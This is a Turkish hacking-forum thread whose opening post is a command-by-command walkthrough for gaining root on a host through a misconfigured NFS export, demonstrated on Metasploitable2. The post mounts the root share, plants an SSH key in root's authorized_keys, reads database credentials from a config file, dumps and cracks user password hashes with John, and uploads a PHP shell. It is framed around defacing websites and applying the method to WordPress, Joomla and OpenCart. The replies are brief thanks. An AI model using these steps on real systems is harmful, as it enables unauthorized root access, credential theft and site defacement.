İPUCU

Genel Güvenlik Web, Gprs, Wap, Üzerinde Gizlenmek İçin Neler Yapmanız Gerekenler ...

Seçenekler

NFS Protokolü ve Zafiyetini Sömürme

25-01-2018 15:52
#1
Üyelik tarihi:
08/2017
Nereden:
Gotham
Mesajlar:
213
Teşekkür (Etti):
58
Teşekkür (Aldı):
44
Konular:
35
Selamun Aleyküm
NFS diye bir protokol var hepimizin bildiği üzere.Bu protokolü bilmiyorsanız şimdi öğreniceksiniz.
Öyleyse başlayalım

NFS kısaca “Yerel*bir*ağda,*birbirine*bağlı*Linux*sistemlerin ,*aralarında*
dosya*paylaşımını*sağlayan*bir*teknolojidir”
● Veri depolamada ucuzluk sağlar
● /etc/exports : Paylaşılan dosya bilgisi bu dosyadadır.
Sanırım bizi çok teknik detay bağlamıyor.Nasılsa bu kon nfs yapılandırması değil.Kısaca dosya paylaşım protokolü olduğunu gördük.


[COLOR="White"]
● nmap ile hedef sistemdeki servisleri listeledik :

● showmount -e hedefIP : Paylaşımları listeledik
● mkdir /tmp/nfs : /tmp dizinine nfs adında bir klasör oluşturduk.
● mount -t nfs <sunucu_adresi>:/<paylasim> <baglanacak_klasör>
istemci oluyoruz.Benim gireceğim komut ise böyle :
● mount -o nolock -t nfs 10.195.2.2:/ /tmp/nfs
● ssh-keygen
● cat .ssh/id_rsa.pub >> /tmp/nfs/root/.ssh/authorized_keys
● umount /tmp/nfs

● ssh root@10.195.2.2

● şimdi erişimimiz oldu işte.Ben bir defacer'sam ilk işim index atmak(!) olucaktır.
Şakasına diyorum zaten root olmuşuz tadını çıkaralım.Lakin bazı komutlar çalışmıyor.Sistem kaynaklı. "ls ,ln gibi" .Ben de python dan yararlanıcağım azıcık.Hava amak için yapıyor demeyin.
● Aslında sizde böyle hatalar vermiyecek.Size bu yoldan anlatmamın sebebi python etkileşimli kabuğun gücünü göstermek hem fena mı olur azıcık python bilginiz olsa.

● ls hataverdi.Yani o klasördeki dosyaları listeleyemiyorum.
● Ben de deface yapacağım web uygulamasının dizinine gidiyorum.(cd komutuyla)
● python yazıp etkileşimli kabuğa geçiş yapıyorum.
● os modülünü aktif ediyorum (import os)
● print os.listdir(".") ---> ile dosyaları listeliyorum
● config dizininde siteye ait gizli ve önemli dosyalar olduğunu tahmin ediyorum
● print os.listdir("config/.") --> ile config dizinindeki dosyaları listeliyorum.
● print open("config/config.inc.php").read() --> ile dosyayı okuyorum ve bana mysql(veritabanı) kullanıcı adı ve şifresini veriyor.
● mysql -u kullanıcı adı -p yazıp entera basarsanız şifre ister ve mysql bağlantısı kurmuş olursunuz.

● show databases; veritabanlarını listeler.
● use veritabanı ismi; ---> ismiverilen veritabanına geçiş yapar
use dvwa;
● show tables; --> tabloları listeliyorum
● select * from users; ---> bana kullanıcı adı şifreleri listeliyor.Son yaptığım veritabanı işine çoğunuz aşinasınızdır zaten sqlmap veya havij sayesinde.

● şifreler md5.kırmamız gerekicek.ben masaüstüme md5.txt ye kaydediyorum
admin:md5şifrenizburaya
● john aracıyla md5leri kırıyorum. md5 ne demek bilmeyenler araştırabilir.temel bir bilgidir.
● john --format=raw-MD5 /root/Desktop/md5.txt

● md5 ler kırıldı.admin panelinden giriş yapın.
● Benim yaptığım işlemlerin mantığını anlarsanız site wordpressmiş,joomlaymış,opencartmış bilmemneymiş vız gelir kolayca indirirsiniz evelAllah
.)
● upload kısmı arıyoruz veya shell atabilecek potansiyel bir zaafiyet.
Upload diye bir bölüm varmış girelim bakalım.Dosya upload etmeye yarıyormuş.Hemen kendi uploader.php dosyamı yüklüyorum.






●Gerisi sizde.Başta root oturumumuz vardı.Neden tekrar shell atmakla vs uğraştık derseniz.Anlatımımı zenginleştirmek için değişik yöntemlerin varlığını göstermek için o yollara başvurdum.

Kullanılan materyaller:
●Kali Linux
●m e t a s p l o i t a b l e 2
●beyin
Kullanıcı İmzası
Türk Milletinin Karakteri Yüksektir
BİZ DÜŞMANI VURCAKSAK UYARMAYIZ !!!
AquieLL, BloodOFCannon Teşekkür etti.

25-01-2018 15:58
#2
AquieLL - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2014
Nereden:
aquu.php
Mesajlar:
3.988
Teşekkür (Etti):
817
Teşekkür (Aldı):
2279
Konular:
625
Ellerine sağlık kardeşim devamını bekliyorum mutlaka.
Kullanıcı İmzası

WWW.TÜRKHACKTEAM.ORG/TV
- AquieLL -
2014-2017
THE DARK ARMY Teşekkür etti.
25-01-2018 16:17
#3
Üyelik tarihi:
08/2017
Nereden:
Gotham
Mesajlar:
213
Teşekkür (Etti):
58
Teşekkür (Aldı):
44
Konular:
35
saolasın. inşAllah vaktim oldukça devamı gelir
Kullanıcı İmzası
Türk Milletinin Karakteri Yüksektir
BİZ DÜŞMANI VURCAKSAK UYARMAYIZ !!!
25-01-2018 21:40
#4
Üyelik tarihi:
08/2017
Nereden:
Gotham
Mesajlar:
213
Teşekkür (Etti):
58
Teşekkür (Aldı):
44
Konular:
35
Alıntı:
AquieLL´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık kardeşim devamını bekliyorum mutlaka.
Birazcık yetki yükseltme ve forensics hakkında bilgi edindim.Onları paylaşmak istiyorum düşünceniz nedir ? (gerekli gereksiz gibisinden)

Word Press Sızma Testi İçin :
http://www.turkhackteam.org/web-serv...-part-1-a.html
Kullanıcı İmzası
Türk Milletinin Karakteri Yüksektir
BİZ DÜŞMANI VURCAKSAK UYARMAYIZ !!!
Konu 'Black Warrior tarafından (30-01-2018 18:57 Saat 18:57 ) değiştirilmiştir.
27-01-2018 12:21
#5
versen5656 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2015
Mesajlar:
3.321
Teşekkür (Etti):
10
Teşekkür (Aldı):
354
Konular:
68
eline saglık
Kullanıcı İmzası
10101010101010100101010100000101010101
1111 0000 1111 000 111 000 11100 11111 00000 1111 0000 000111 188 177 191 178 185 184 186 187 192 193 190 178 179 175 176 194 195 196 197
101010101010101010100101
27-01-2018 12:51
#6
Üyelik tarihi:
12/2017
Mesajlar:
345
Teşekkür (Etti):
9
Teşekkür (Aldı):
22
Konular:
33
Eline Saglık
27-01-2018 13:37
#7
Üyelik tarihi:
08/2017
Nereden:
Gotham
Mesajlar:
213
Teşekkür (Etti):
58
Teşekkür (Aldı):
44
Konular:
35
Alıntı:
versen5656´isimli üyeden Alıntı Mesajı göster
eline saglık
Alıntı:
KaraMelek13´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık
Alıntı:
VATANMEVZUSU´isimli üyeden Alıntı Mesajı göster
Eline Saglık
Teşekkürler
Kullanıcı İmzası
Türk Milletinin Karakteri Yüksektir
BİZ DÜŞMANI VURCAKSAK UYARMAYIZ !!!

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı